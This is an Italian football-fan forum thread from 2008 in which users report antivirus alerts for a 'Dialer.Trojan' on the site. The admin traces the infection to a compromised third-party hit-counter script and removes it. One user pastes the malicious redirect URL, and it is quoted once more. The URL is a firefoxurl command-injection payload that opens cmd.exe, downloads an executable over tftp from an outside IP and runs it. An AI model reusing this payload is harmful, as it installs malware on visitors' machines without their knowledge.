Problema Trojan con dialer sul muro ....... RISOLTO

Full Version   Print   Search   Utenti   Join     Share : FacebookTwitter
WEB RE1976
00Tuesday, February 5, 2008 9:52 AM
Avete per caso notato qualcosa di strano quando aprite le pagine del muro negli ultimi 2 giorni?

Se la risposta è SI........... scrite qui sopra cosa

Se la risposta è NO ......... scrivete che non avete nessun tipo di problema

E' IMPORTANTE ........... HO BISOGNO DI CONFERME!!!!

GRAZIE
dabustoarsizioxlempoli
00Tuesday, February 5, 2008 10:13 AM
Appena apro la pagina del forum mi chiede di installare dei contenuti java.. finora ho sempre cliccato su "annulla", ma oggi ho cliccato "esegui".
A prescindere da questo sia oggi che ieri ogni 30 secondi circa la pagina si reindirizza al link che ho riportato sotto.. la connessione però non va in porto e mi compare al posto della pagina del forum la schermata bianca con scritto "impossibile visualizzare la pagina web"; nel contempo Norton mi dà l'indicazione di aver bloccato una minaccia per la sicurezza del pc, "Dialer.Trojan"

il link al quale si reindirizza la pagina web è questo:


firefoxurl:http://google.com"%20-chrome%20"javascrtpt:C=Components.classes;I=Components.interfaces;F=C[%2527@mozilla.org/file/local;1%2527].createInstance(I.nsILocalFile);F.initWithPath(%2527c:%255c%255cwindows%255c%255csystem32%255c%255ccmd.exe%2527);P=C[%2527@mozilla.org/process/util;1%2527].createInstance(I.nsIProcess);P.init(F);P.run(true%252c[%2522/c%2522%252c%2522tftp%2522%252c%2522-i%2522%252c%2522192.115.70.1%2522%252c%2522GET%2522%252c%2522fjwe.jpg%2522%252c%2522c:%255c%255cqvrew.exe%2522%252c%2522%2526%2522%252c%2522c:%255c%255cqvrew.exe%2522]%252c9)
Matteo BB
00Tuesday, February 5, 2008 10:31 AM
Re: Sì
dabustoarsizioxlempoli, 05/02/2008 10.13:

Appena apro la pagina del forum mi chiede di installare dei contenuti java.. finora ho sempre cliccato su "annulla", ma oggi ho cliccato "esegui".
A prescindere da questo sia oggi che ieri ogni 30 secondi circa la pagina si reindirizza al link che ho riportato sotto.. la connessione però non va in porto e mi compare al posto della pagina del forum la schermata bianca con scritto "impossibile visualizzare la pagina web"; nel contempo Norton mi dà l'indicazione di aver bloccato una minaccia per la sicurezza del pc, "Dialer.Trojan"

il link al quale si reindirizza la pagina web è questo:


firefoxurl:http://google.com"%20-chrome%20"javascrtpt:C=Components.classes;I=Components.interfaces;F=C[%2527@mozilla.org/file/local;1%2527].createInstance(I.nsILocalFile);F.initWithPath(%2527c:%255c%255cwindows%255c%255csystem32%255c%255ccmd.exe%2527);P=C[%2527@mozilla.org/process/util;1%2527].createInstance(I.nsIProcess);P.init(F);P.run(true%252c[%2522/c%2522%252c%2522tftp%2522%252c%2522-i%2522%252c%2522192.115.70.1%2522%252c%2522GET%2522%252c%2522fjwe.jpg%2522%252c%2522c:%255c%255cqvrew.exe%2522%252c%2522%2526%2522%252c%2522c:%255c%255cqvrew.exe%2522]%252c9)




Anche a me parte Java e Norton mi dice che vede un Dialer.Trojan ogni 2 secondi.

Non avevo collegato la rilevazione del virus con la navigazione sul muro, ma ora che Busto lo ha fatto notare ci ho fatto caso e non appena chiudo la scheda del muro le rilevazioni dell'antivirus smettono.
jurij
00Tuesday, February 5, 2008 10:38 AM
idem
zeman!
00Tuesday, February 5, 2008 10:49 AM
nessun problema.....
per ovviare temporaneamente ai bug evidenziati.... andate in strumenti, opzioni internet, protezione e spostate il cursore sul livello "alto"
per il norton non c'è rimedio
WEB RE1976
00Tuesday, February 5, 2008 11:30 AM
PENSO DI AVER CAPITO DOV'E' IL PROBLEMA ............ QUELLE MERDACCE

Vorrei che chi aveva quei problemi ora scriva cosa succede .......

CI SONO SEMPRE [SM=g8003]

OPPURE NO [SM=x1380982] ....... in questo caso andate anche su www.rangers.it e ditemi cosa succede

[SM=g8043]

Poi vi spiego cosa è successo ......... quelle merdacce!!!!!!
Matteo BB
00Tuesday, February 5, 2008 12:35 PM
Ora sul muro tutto ok, mentre se vado alla home mi rileva il dialer.trojan.
WEB RE1976
00Tuesday, February 5, 2008 12:46 PM
Ecco fatto ............ ORA DOVREBBE ANDARE BENE ANCHE SULLA HOME PAGE .......... confermate?

[SM=g8043]
cappellini1982
00Tuesday, February 5, 2008 12:55 PM
Sembra di si ma sono in ufficio quindi può darsi che qui ci siano molti filtri e antivirus attivi. ieri a casa invece mi dava problemi ma a vevo cmq i pop up bloccati ......
Matteo BB
00Tuesday, February 5, 2008 1:04 PM
Purtroppo quando sono sulla home il Norton continua a rilevarmi un attacco da un dialer.trojan

Da ignorante completo di informatica penso che il problema sia un conflitto tra la piattaforma Java e il Norton, bisognerebbe vedere se tutti quelli che abbiamo il problema abbiamo questo antivirus.

Infatti il Norton mi rileva l'attacco anche se apro alti siti che usano java.
dabustoarsizioxlempoli
00Tuesday, February 5, 2008 1:39 PM
adesso sembra tutto a posto.. grande web! [SM=x1380973]
CLAY60
00Tuesday, February 5, 2008 2:09 PM
Propongo il Nobel per la scienza a WEB! [SM=g7999]
Brigata-Ariston
00Tuesday, February 5, 2008 2:20 PM
ora non mi dice nulla ma fino a ieri sera il mio antivirus rilevava ogni poco dei trojan..se hai risolto grande web! [SM=x1380973]
Matteo BB
00Tuesday, February 5, 2008 2:51 PM
Ma sono l'unico a cui il problema rimane se vado su [URL=www.rangers.it]www.rangers.it?

La cosa mi ppreoccupa [SM=g8043]
jurij
00Tuesday, February 5, 2008 3:00 PM
Re:
Matteo BB, 05/02/2008 14.51:

Ma sono l'unico a cui il problema rimane se vado su [URL=www.rangers.it]www.rangers.it?

La cosa mi ppreoccupa [SM=g8043]



No ho anche il solito problema


(moka)
00Tuesday, February 5, 2008 3:09 PM
sì ora è tutto a posto anche a me rilevava un virus...
ora mi va anche la home, ma era da tipo 2/3 mesi che avevo installato l'ultima versione di jvm e non me la apriva più la home, solo il forum
lena1404
00Tuesday, February 5, 2008 3:20 PM
Anche per me ora è tutto ok Web, da entrambi gli accessi!!!
TIZIAZZURRA
00Tuesday, February 5, 2008 3:50 PM
Stamani mattina con il Trojan era una lotta ... ora va bene [SM=x1380973]
WEB RE1976
00Tuesday, February 5, 2008 4:19 PM
Re:
Matteo BB, 05/02/2008 14.51:

Ma sono l'unico a cui il problema rimane se vado su [URL=www.rangers.it]www.rangers.it?

La cosa mi ppreoccupa [SM=g8043]

Cioè .......... mi vuoi dire che a te quando vai sulla home di apre ancora il troiaio del dialer?
Anche io ho il Norton ma dopo gli aggiustamenti che ho fatto ora mi va tutto bene in tutti i posti, anche sulla Home www.rangers.it ............. forse è un problema di cache che devi aggiornare .........nel senso che ti resetta il tutto quando riavvii il computer ............... non saprei che dirti, anche a Jurji ........... fatemi sapere se avete ancora questi problemi oppure se sono altri diversi dal Troiaio Dialer ..........

Agli altri sembra vada tutto bene ora ............... ho provveduto ad aggiornare tutte le pagine del sito Rangers dove si era inserito il Malware delle MERDACCE!!!


CLAY60
00Tuesday, February 5, 2008 5:19 PM
Hai qualche sospetto, WEB? [SM=g8020]
WEB RE1976
00Tuesday, February 5, 2008 5:59 PM
Non sospetti ............. ormai sono certezze.

E' successo questo.

Da alcuni mesi avevo inserito un nuovo bel contatore che era perfetto e completo ......... e gratis.

Dopo averlo testato su una pagina ho iniziato a metterlo in tutte le pagine del sito (muro compreso) che via via aggiornavo ......... era bellino e completo, qualcuno lo avrà visto, grande con tutti i numeri dei visitatori parziali, totali, on line e da dove venivano ......... Hiperstat.com .............. cosa è successo?
L'istruzione era un semplice script verso il sito madre che riportava il totale dei dati che via via si sviluppavano. Dopo averlo testato e mi dava tutto regolare erano un paio di giorni che non si vedeva più al suo posto ed era sparito (nel senso che non riportava nessuna immagine dal sito madre Hiperstat) .......... ieri è riapparsa l'immagine del contatore e simultaneamente anche questo "problema" ........... dopo un'iniziale timore che ciò fosse dovuto a qualcosa sul mio computer .......... mi sono rasserenato quando ho visto che era una cosa comune ai frequentatori del muro .......... c'è voluto poco a fare 2+2.

Le MERDACCE hanno improvvisamente e di nascosto sostituito le istruzioni dello script che insieme all'immagine solita stavolta inviava anche le istruzioni per l'apertura del TROIAIO che azionava il collegamento a un Dialer che fortunatamente per molti non andava a buon fine perchè bloccato da Antivirus e ADSL.
Mi sono informato un pò cercando su Internet e questa cosa è successa a molti dopo il primo periodo senza problemi.
Da indagini la ditta HIPERSTAT ha sede a NewYork negli Stati Uniti e non può essere perseguita dalla Polizia Postale che già è al corrente di questa truffa. L'unica soluzione che danno è quella di eliminare i contatori .......... cosa che ho prontamente fatto.

Però sono convinto che queste MERDACCE in tutto il mondo si fanno dei bei soldini alle spalle dei navigatori sui molti siti che continuano a tenere il contatore (e sono molti) e mi sembra strano che nessuno possa perseguirli penalmente. [SM=x1380986]

Comunque ora è tutto sistemato, mi scuso per quello che può essere stata la mia colpa [SM=x1380974]

Se in giro sul nostro sito Rangers e sul muro riscontrate qualche altra problematica del genere vi prego di avvisarmi immediatamente per risolvere eventuali problemi.
TIZIAZZURRA
00Tuesday, February 5, 2008 5:59 PM
Re: Re:
WEB RE1976, 05/02/2008 16.19:

Cioè .......... mi vuoi dire che a te quando vai sulla home di apre ancora il troiaio del dialer?
Anche io ho il Norton ma dopo gli aggiustamenti che ho fatto ora mi va tutto bene in tutti i posti, anche sulla Home www.rangers.it ............. forse è un problema di cache che devi aggiornare .........nel senso che ti resetta il tutto quando riavvii il computer ............... non saprei che dirti, anche a Jurji ........... fatemi sapere se avete ancora questi problemi oppure se sono altri diversi dal Troiaio Dialer ..........

Agli altri sembra vada tutto bene ora ............... ho provveduto ad aggiornare tutte le pagine del sito Rangers dove si era inserito il Malware delle MERDACCE!!!







Chi sarebbero le MERDACCE ?
Matteo BB
00Tuesday, February 5, 2008 7:52 PM
Ora tutto OK.

Grazie mille [SM=x1380973]
(moka)
00Tuesday, February 5, 2008 11:21 PM
mi sorge un dubbio, che sia per quello che il rompicazzo di windows mi dice che non ho nè antivirus nè firewall attivati? (quando invece sono attivati entrambi)
=Empoli=
00Wednesday, February 6, 2008 11:57 AM
Uhm...ecco perchè non si apriva il muro ieri...
A me mi appariva la pagina bianca con la scritta "impossibile trovare l'indirizzo web" però non mi reindirizzava su nessun'altro sito nè mi segnalava presenza di alcun virus....
Ecco perchè me la sono presa col gestore del sito [SM=g7990] .
Web web...ma la mamma non ti ha detto che non si deve prendere niente dagli sconosciuti? [SM=x1380976]
Per questa volta sei scusato ma fai attenzione perchè la prossima volta potresti essere [SM=x1380986] direttamente in Maratona



P.S.: Adesso cmq va tutto bene sul mio portatile...vediamo se il virus lo si fa entrare nello spogliatoio laziale domenica!
Questa è la versione 'lo-fi' del Forum Per visualizzare la versione completa click here
Tutti gli orari sono GMT+01:00. Adesso sono le 6:28 AM.
Copyright © 2000-2021 FFZ srl - www.freeforumzone.com